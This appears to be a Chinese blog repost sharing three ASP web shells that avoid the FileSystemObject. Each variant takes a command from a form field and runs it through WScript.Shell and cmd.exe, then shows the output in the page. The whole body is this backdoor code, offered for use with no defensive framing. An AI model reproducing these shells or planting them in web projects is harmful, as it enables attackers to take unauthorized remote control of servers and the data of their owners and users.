免FSO的CMD.ASP带回显
蓝屏的原码在这儿:
免fso的cmd.asp带回显
< error resume next
if request("ad")<>"" then response.status="401 not authorized"
set z=server.createobject("wscript.shell")
t=server.mappath("lp"&year(date)&session.sessionid&".txt")
sz=request("ck")
if sz=""then sz="set"
z.run "%comspec% /c^"&sz&">"&t,0,true
response.write "<form method=post><input type=text name=ck value=’"&sz&"’> <input type=submit value=run> <input type=reset value=reset> <input type=submit
name=ad title=passwordwantted value=runasadmin></form><br>执行了["&sz&"]
{临时文件}["&t&"]<iframe src=’lp"&year(date)&session.sessionid&".txt’ width=9
9% height=99% frameborder=0></iframe>"
response.flush
for i=1 to 1800000
ys=9+9
next
z.run "%comspec% /c echo y│del "&t,1,true
set z=nothing%>
lcx根据蓝屏的又改了一个,:
<%
dim oscript
dim szcmd, sztempfile ,del
set oscript = server.createobject("wscript.shell")
szcmd = request.form(".cmd")
del=request.form("del")
if (szcmd <> " " ) then
sztempfile = "d:"&"l"&year(date)&".txt"
call oscript.run ("cmd.exe /c echo no fso aspmm v0.0 by >" & sztempfile, 0, true)
call oscript.run ("cmd.exe /c " & szcmd & " > " & sztempfile, 0, true)
end if
if (del = "deltempfile") then
call oscript.run( "cmd.exe /c del "&sztempfile,0,true)
end if
%>
<form method="post">
<input type=text name=".cmd" size=45 >
<input type=submit value="run"> <input type=submit value="deltempfile" name=del>
<%
response.write "<iframe src=’d:l"&year(date)&".txt’ width=99% height=99%
frameborder=0></iframe>" %>
set oscrip=nothing
%>
</form>
不用这么麻烦吧。瞧zzzevazzz的:
<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
上一篇: 2017 blog情感
下一篇: 高并发实时性网络视频监控项目实战